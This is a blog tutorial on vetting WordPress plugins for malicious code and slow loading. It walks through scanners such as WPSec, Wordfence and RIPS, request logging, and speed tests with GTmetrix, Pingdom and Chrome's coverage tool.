Plugins can bring many advantages to your WordPress website. However, you should consider carefully before using one because it may contain viruses and malicious codes. They also may affect your website loading speed/performance. To check if a plugin has an issue, especially for a newly launched plugin, you can use various useful tools and follow the steps below.

But first, don't rush to install the plugin on your website. Let's choose another site to test the plugin's safety and performance.

Check the Safety of a WordPress Plugin

Using Online Tools

WPSec is a powerful tool to scan your WordPress site to see if it is protected from threats.

First, go to this site, then enter the website address and click Start Scan.

Use WPSec to scan your WordPress website to detect any threat from the plugins and others, to know how it is secured

After finishing the scanning process, this tool will give you the results to see if your page is safe, and how many dangerous elements are there. For example, my site is quite secure. It means that there is no issue with the plugins used on my site.

To regularly receive notifications about your website security warnings, you can sign up for an account (it’s free) on WPSec.

you can sign up a free account to regularly receive notifications about your website security warnings

By doing these steps above, you can regularly check if your website has any issue or if your using plugins affect your website.

Dashboard of WPSec lets you know issues of your website, where is the vulnerability, unsecured

Using Another Plugin

Using a plugin to test another plugin sounds weird, but it really makes sense.

You should choose some credible plugins such as Wordfence Security and Log HTTP Requests.

Wordfence Security is one of the most famous plugins in detecting and eradicating malicious codes on WordPress websites. You just need to install and activate Wordfence Security for free from the Dashboard. After activating the plugin, a new Wordfence menu appears. Go to it and you will see the interface of Wordfence Security as below. Then, click Start New Scan.

Use Wordfence Security to scan your WordPress website to know how it is secured

Wait a short time for the plugin’s scanning. And then, it will list the issues which you have on your site, including ones from plugins. Click on the magnifier icon to see the details.

Wordfence Security lists all the issues /threats of your website including from the plugins after scanning

For example, the Meta Box plugin has no concern about malware problems. You only need to update it to the latest version. If there are other troubles, Wordfence Security will notify you. After that, you can consider whether to use the plugin or not.

See the details of each issue found by Wordfence Security to know exactly what they are

Next, if you use the Log HTTP Requests plugin to check, you will see which are being sent from your website including all the HTTP requests, AJAX requests, as well as your website data.

Install Log HTTP Requests from the dashboard

Once installed, the plugin will log the data of requests. You can go to Tools > Log HTTP Request to see them:

Records of all the HTTP requests from your WordPress website logged by Log HTTP Requests to avoid vulnerable

From these records, you will know which kind of data will be sent or received by the plugin. Spend time checking them to make sure that the plugin does not leak your important data or get something weird.

Detecting Unusual Code in the Plugin

Finally, you should check if there is any unusual code in the plugin or if it connects to other sites.

For example, if your plugin contains codes like this, you should reconsider using it:

An example of a weird code in a plugin

Using RIPS Scanner

You can use the RIPS Scanner to check if your plugin is null or contains malicious code. RIPS will scan, check PHP files, and then notify you about the plugin’s issues. Here are the steps to use RIPS for scanning:

  1. Step 1: Download the tool here;
  2. Step 2: Extract the tool to the web root directory;
  3. Step 3: Go to domain/rips to scan.

Check If the Plugin Slows Down the Site

GTmetrix and Pingdom are the top of mind tools to check if a plugin is slowing down your site. But note that these tools do not list which plugins are causing your website performance issues. So, you also should go to the plugin’s CSS/JS files to check whether the issues are from the plugin or not as well.

Using GTmetrix

Go to GTmetrix and enter your website’s URL, then click Test Your Site and wait for a while for the scanning.

Use GTmetrix to check your website speed / performance and how the plugins affect it

When the scanning process finishes, scroll down to the Top Issues section. You will see the issues listed from High (which affects page speed the most), Med-Low (which affects page speed on average), and Low (which affects the page speed just a little bit). Let's see if some of them are from the plugin that you are using. To learn more about every issue, you can click on the arrow next to it.

GTmetrix lists all the issues that make your website low speed / performance

Using Pingdom

Use Pingdom to check your website speed / performance and how the plugins affect it

Enter your website domain on Pingdom as well. Wait and scroll down to the Improve Page Performance section, the tool will evaluate and give you scores for the site speed from 0 to 100. Then, click on the arrow icon next to the sections with low scores to find out where the problem is.

List of the problems that make your website low speed / performance, provided by Pingdom

Check for Unused CSS/JS Files

In addition to using the two above tools, you can take advantage of the browser's console to view the plugin's resources (CSS/JS files).

You can enable the coverage tool in Chrome Dev tools > select the three-dot button > More tools > Coverage and see if there are unused CSS/JS files.

Find the unused css/js files and remove theme to improve the website speed and performance

If there are any unused files, you should remove them. I have a tutorial on deleting unused CSS/JS files here, follow it to know-how.

Other Methods

If you hire a developer to create a plugin for you and the plugin has not been uploaded to wordpress.org, you can try to upload it. This team will review the plugin carefully. Wow, just a small trick but it may take a lot of time.

Alternatively, you can try joining some communities to ask someone, even experienced developers, to test it out.

The Last Words

You see, there are many ways to check if a plugin affects the speed or security of your WordPress website. No matter which tool you are using to test, try to leverage them well to check the plugin carefully.

In particular, choosing plugins developed by reliable and credible companies or developers is quite an ideal way. Remember to update the plugin regularly as well to have its best version with the highest security.

Leave a Reply

Your email address will not be published. Required fields are marked *